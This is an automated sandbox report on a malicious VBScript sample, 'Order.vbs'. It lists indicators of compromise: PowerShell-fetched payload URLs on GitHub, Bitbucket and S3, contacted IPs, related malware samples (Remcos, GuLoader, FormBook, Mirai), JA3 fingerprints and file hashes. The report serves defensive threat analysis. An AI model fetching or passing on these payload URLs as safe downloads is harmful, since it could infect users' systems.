                                                        https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://cdn.cookielaw.org/powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723powershell.exe, 00000003.00000002.2679834341.000002818745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F5045C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmptrue
                                                              		unknown
                                                              https://aui-cdn.atlassian.com/powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://aka.ms/pscore68powershell.exe, 00000003.00000002.2679834341.0000028186F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2679834341.0000028186F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F500001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://bitbucket.orgpowershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      		unknown
                                                                      https://bbuseruploads.s3.amazonaws.com/cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-powershell.exe, 00000006.00000002.2379283237.000001F5003FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        154.216.17.141
                                                                        		unknownSeychelles
                                                                        		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                                                        52.217.161.161
                                                                        		s3-w.us-east-1.amazonaws.comUnited States
                                                                        		16509AMAZON-02UStrue
                                                                        185.166.143.48
                                                                        		bitbucket.orgGermany
                                                                        		16509AMAZON-02UStrue
                                                                        185.199.108.133
                                                                        		raw.githubusercontent.comNetherlands
                                                                        		54113FASTLYUStrue
                                                                        178.237.33.50
                                                                        		geoplugin.netNetherlands
                                                                        		8455ATOM86-ASATOM86NLfalse

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1538690
                                                                        Start date and time:2024-10-21 17:04:10 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 6m 27s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:15
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Order.vbs
                                                                        Detection:MAL
                                                                        Classification:mal100.rans.spre.troj.spyw.expl.evad.winVBS@10/13@4/6
                                                                        EGA Information:
                                                                        • Successful, ratio: 50%
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 50
                                                                        • Number of non-executed functions: 139
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .vbs

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 184.28.90.27
                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                                        • Execution Graph export aborted for target powershell.exe, PID 1880 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: Order.vbs

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        11:05:13API Interceptor41x Sleep call for process: powershell.exe modified
                                                                        11:05:32API Interceptor2x Sleep call for process: svchost.exe modified
                                                                        11:05:59API Interceptor1070640x Sleep call for process: RegAsm.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        185.166.143.48https://bitbucket.org/36273637sunshine/sunshine/downloads/example.exeGet hashmaliciousUnknownBrowse
                                                                          Z2tJveQl3B.exeGet hashmaliciousUnknownBrowse
                                                                            70973273827.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              ip4.cmdGet hashmaliciousUnknownBrowse
                                                                                Doc047892345y.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                  SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                    849128312.cmdGet hashmaliciousUnknownBrowse
                                                                                      6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                        OTO2wVGgkl.exeGet hashmaliciousUnknownBrowse
                                                                                          https://tiotapas.com.auGet hashmaliciousUnknownBrowse
                                                                                            185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                            178.237.33.50rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                            lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                            172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                            Ibnh3BCQSQ.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                            nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • geoplugin.net/json.gp

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            bitbucket.orghttps://bitbucket.org/36273637sunshine/sunshine/downloads/example.exeGet hashmaliciousUnknownBrowse
                                                                                            • 185.166.143.48
                                                                                            Z2tJveQl3B.exeGet hashmaliciousUnknownBrowse
                                                                                            • 185.166.143.48
                                                                                            PI and payment confirmed Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                                            • 185.166.143.50
                                                                                            890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                            • 185.166.143.50
                                                                                            https://bitbucket.org/aaa14/aaaa/downloads/script3.txtGet hashmaliciousUnknownBrowse
                                                                                            • 185.166.143.50
                                                                                            https://bitbucket.org/aaa14/aaaa/downloads/xwormberlyn.txtGet hashmaliciousUnknownBrowse
                                                                                            • 185.166.143.49
                                                                                            70973273827.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                            • 185.166.143.48
                                                                                            ip4.cmdGet hashmaliciousUnknownBrowse
                                                                                            • 185.166.143.48
                                                                                            Proforma fatura ektedir.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                            • 185.166.143.49
                                                                                            Doc047892345y.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                            • 185.166.143.48
                                                                                            s3-w.us-east-1.amazonaws.comhttps://bitbucket.org/36273637sunshine/sunshine/downloads/example.exeGet hashmaliciousUnknownBrowse
                                                                                            • 3.5.28.243
                                                                                            https://www.bing.com/ck/a?!&&p=c60f44e2e0299106bbda17ed4610b6a047eac19fa538687ebec1fc78213d7903JmltdHM9MTcyOTEyMzIwMA&ptn=3&ver=2&hsh=4&fclid=234c270a-e3bc-6c48-2bf3-3210e2866d6d&psq=Siemens+v17&u=a1aHR0cHM6Ly9wbGM0bWUuY29tL2Rvd25sb2FkLXRpYS1wb3J0YWwtdjE3LWZ1bGwtdmVyc2lvbi1nb29nbGVkcml2ZS8&ntb=1Get hashmaliciousUnknownBrowse
                                                                                            • 52.217.121.241
                                                                                            https://vendor-agreement.s3.amazonaws.com/folder4/doc-11te68fpfa.htmlGet hashmaliciousUnknownBrowse
                                                                                            • 3.5.28.238
                                                                                            Simple.exeGet hashmaliciousUnknownBrowse
                                                                                            • 3.5.28.174
                                                                                            Simple.exeGet hashmaliciousUnknownBrowse
                                                                                            • 3.5.28.119
                                                                                            PI and payment confirmed Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                                            • 3.5.12.147
                                                                                            890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                            • 3.5.25.173
                                                                                            Account report.docxGet hashmaliciousUnknownBrowse
                                                                                            • 52.217.103.156
                                                                                            Account report.docxGet hashmaliciousUnknownBrowse
                                                                                            • 3.5.29.61
                                                                                            https://bitbucket.org/aaa14/aaaa/downloads/script3.txtGet hashmaliciousUnknownBrowse
                                                                                            • 3.5.28.88
                                                                                            bg.microsoft.map.fastly.netDRUMMONDLTD _ 21ST_OCTOBER_2024 _.PDFGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            https://docs.google.com/drawings/d/1rNIRSAgTQ9BvkQDgt6I1-bvyHw8Lwl60PfNx3hGnniY/preview?pli=128762876287628762876287628762876Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            Carboline Quote Request.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 199.232.214.172
                                                                                            TENDER ADDENDUM NO. 01.vbsGet hashmaliciousGuLoaderBrowse
                                                                                            • 199.232.214.172
                                                                                            272766612509812656.jsGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            Aviso de transferencia.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                            • 199.232.210.172
                                                                                            258491645830653677.jsGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.214.172
                                                                                            ekte.exeGet hashmaliciousFormBookBrowse
                                                                                            • 199.232.210.172
                                                                                            https://library.wic.ac.uk/upload/~/app/step2.php?id=37602430Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            https://library.wic.ac.uk/upload/~/app/step3.php?id=5384235Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.214.172

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            AMAZON-02USDocument.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.61
                                                                                            INV00663.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 18.239.83.112
                                                                                            https://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5fGet hashmaliciousUnknownBrowse
                                                                                            • 35.163.144.222
                                                                                            Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.98
                                                                                            Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.98
                                                                                            PO-1021202416777 PNG2023-W111.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.22
                                                                                            Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.93
                                                                                            PO-1021202416777 PNG2023-W111.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.9
                                                                                            https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20=Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                            • 18.245.31.33
                                                                                            https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2FCGJiV2TYiHhEjaWZAqcgtold/S0pvbmVzQGtvbmlhZy1ncy5jb20=Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                            • 18.245.31.33
                                                                                            SKHT-ASShenzhenKatherineHengTechnologyInformationCobot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 154.216.17.159
                                                                                            bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                            • 154.216.17.159
                                                                                            bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                            • 154.216.17.159
                                                                                            bot.x86_64.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                            • 154.216.17.159
                                                                                            bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                            • 154.216.17.159
                                                                                            bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 154.216.17.159
                                                                                            bot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                            • 154.216.17.159
                                                                                            bot.sh4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                            • 154.216.17.159
                                                                                            bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                            • 154.216.17.159
                                                                                            bot.arm.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                            • 154.216.17.159
                                                                                            AMAZON-02USPO-1021202416777 PNG2023-W111.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.9
                                                                                            Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.61
                                                                                            INV00663.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 18.239.83.112
                                                                                            https://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5fGet hashmaliciousUnknownBrowse
                                                                                            • 35.163.144.222
                                                                                            Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.98
                                                                                            Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.98
                                                                                            PO-1021202416777 PNG2023-W111.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.22
                                                                                            Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.93
                                                                                            PO-1021202416777 PNG2023-W111.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 76.76.21.9
                                                                                            https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20=Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                            • 18.245.31.33
                                                                                            FASTLYUShttps://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5fGet hashmaliciousUnknownBrowse
                                                                                            • 151.101.128.176
                                                                                            https://infinconsumer.lh1ondemand.com/Get hashmaliciousUnknownBrowse
                                                                                            • 151.101.128.114
                                                                                            https://www.google.hn/url?q=//www.google.ee/amp/s/h2f35e7.ubpages.com/bdeda8-f4eb-4ed8-bGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 185.199.108.153
                                                                                            ConstateGet hashmaliciousUnknownBrowse
                                                                                            • 151.101.67.6
                                                                                            https://library.wic.ac.uk/upload/~/app/step2.php?id=37602430Get hashmaliciousUnknownBrowse
                                                                                            • 151.101.130.137
                                                                                            https://library.wic.ac.uk/upload/~/app/step3.php?id=5384235Get hashmaliciousUnknownBrowse
                                                                                            • 151.101.194.137
                                                                                            https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 151.101.2.132
                                                                                            https://s3.us-east-2.amazonaws.com/revealedgceconomies/vdiq197yvi/ImgBurn_822881.exe?Get hashmaliciousUnknownBrowse
                                                                                            • 185.199.108.133
                                                                                            http://www.5movierulz.momGet hashmaliciousUnknownBrowse
                                                                                            • 185.199.110.133
                                                                                            8NR95Z54o9.jsGet hashmaliciousSTRRATBrowse
                                                                                            • 199.232.196.209

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0eindex.htmlGet hashmaliciousUnknownBrowse
                                                                                            • 185.199.108.133
                                                                                            • 52.217.161.161
                                                                                            • 185.166.143.48
                                                                                            Ricevuta_di_pagamento.vbsGet hashmaliciousGuLoaderBrowse
                                                                                            • 185.199.108.133
                                                                                            • 52.217.161.161
                                                                                            • 185.166.143.48
                                                                                            https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20=Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                            • 185.199.108.133
                                                                                            • 52.217.161.161
                                                                                            • 185.166.143.48
                                                                                            https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2Fn8shpNHR5esID4MN5V6n2I56/RENhcm5vdnNreUBrb25pYWctZ3MuY29tGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                            • 185.199.108.133
                                                                                            • 52.217.161.161
                                                                                            • 185.166.143.48
                                                                                            index.htmlGet hashmaliciousUnknownBrowse
                                                                                            • 185.199.108.133
                                                                                            • 52.217.161.161
                                                                                            • 185.166.143.48
                                                                                            TENDER ADDENDUM NO. 01.vbsGet hashmaliciousGuLoaderBrowse
                                                                                            • 185.199.108.133
                                                                                            • 52.217.161.161
                                                                                            • 185.166.143.48
                                                                                            IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • 185.199.108.133
                                                                                            • 52.217.161.161
                                                                                            • 185.166.143.48
                                                                                            RFQ 1307.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 185.199.108.133
                                                                                            • 52.217.161.161
                                                                                            • 185.166.143.48
                                                                                            Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbsGet hashmaliciousGuLoaderBrowse
                                                                                            • 185.199.108.133
                                                                                            • 52.217.161.161
                                                                                            • 185.166.143.48
                                                                                            FACTURA RAGOZA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 185.199.108.133
                                                                                            • 52.217.161.161
                                                                                            • 185.166.143.48

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.7263224106465184
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0n:9JZj5MiKNnNhoxu2
                                                                                            MD5:20CFC810633BADCA9989FBC80B50EB38
                                                                                            SHA1:AC3849B2E3F3A655864FA356BF666BC891DF13E6
                                                                                            SHA-256:390E6F7B7CB114718735F8608C65A4C826B80251D2238B6FA51634FBEB0A1395
                                                                                            SHA-512:A8BD8145E58BB43D1FDBFC0663A55F0E69FE87A3324D4A3720336AA9A36EC0F9620CC64FA2F2A2894A490729202D8196D466DDE93231475AF525D51135215A9E
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0x68e0ee62, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.7555816831759415
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:dSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:dazaSvGJzYj2UlmOlOL
                                                                                            MD5:BC1D51189410599C6178C3C6E655FE42
                                                                                            SHA1:268E2E6C7BFF4D971ADDAC4613C906E916AA4105
                                                                                            SHA-256:EAFA6E5F9E671B72FEAD7F2797641AE5B95296D4EDA0481352C29AABAA822E67
                                                                                            SHA-512:5D8812CF6A42C122EA3D8309C8D97BFC01B4C23D78CAFD146906888E648426F50043070D1E2B4B192D677FE83F1D1415D29991E0A9A5B907518EC63D7D201379
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:h..b... .......7.......X\...;...{......................0.e......!...{?. ....|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{................................../... ....|!.................o... ....|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.07889440851284857
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:3mXEYeyyZmh3reuNaAPaU1lI0vVhlXlolluxmO+l/SNxOf:WUzBmhKuNDPaUw+zegmOH
                                                                                            MD5:6C9A0A118D2B0DCF1E0B27A1B448B42B
                                                                                            SHA1:E95AFA2BEF49881A242B2CFDC1F292D5C53C77EE
                                                                                            SHA-256:A1FA80F7B6BF837F5A7F9112868B49EB9829E39B00EDF931A61328AA4D0D1B83
                                                                                            SHA-512:D7F5C07097E89C7F94BFE62B05D705D7FE109607D9D1D685D423C816BA757599399CC9A32C14358A3FE5CA5A76DF728D9B3006CB10C7C154BF22403ADD72B4B5
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:.d.......................................;...{.. ....|...!...{?..........!...{?..!...{?..g...!...{?.................o... ....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                            File Type:JSON data
                                                                                            Category:modified
                                                                                            Size (bytes):960
                                                                                            Entropy (8bit):5.007342357625525
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:tkhEVBnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwc:qhEV1dVauKyGX85jvXhNlT3/73clHWro
                                                                                            MD5:2384C8ED5D39845A7043C8E4AF84F3F2
                                                                                            SHA1:1A4A72CFF979CDD293034EFDFB35F0C6FA3ABD75
                                                                                            SHA-256:AFB89F4CFEB681642FBADDAFE06E6BFAA298850FDA6771E80BA97B8A79527465
                                                                                            SHA-512:387793D3C3700EFA89D4197DFB11FC667C63C6416068DCC2751953FE6C6EEAA4F2534D32F2F8E9EBB2F5119229BDADB173985E6EF106EFFF71180441197F7291
                                                                                            Malicious:false
                                                                                            Reputation:low
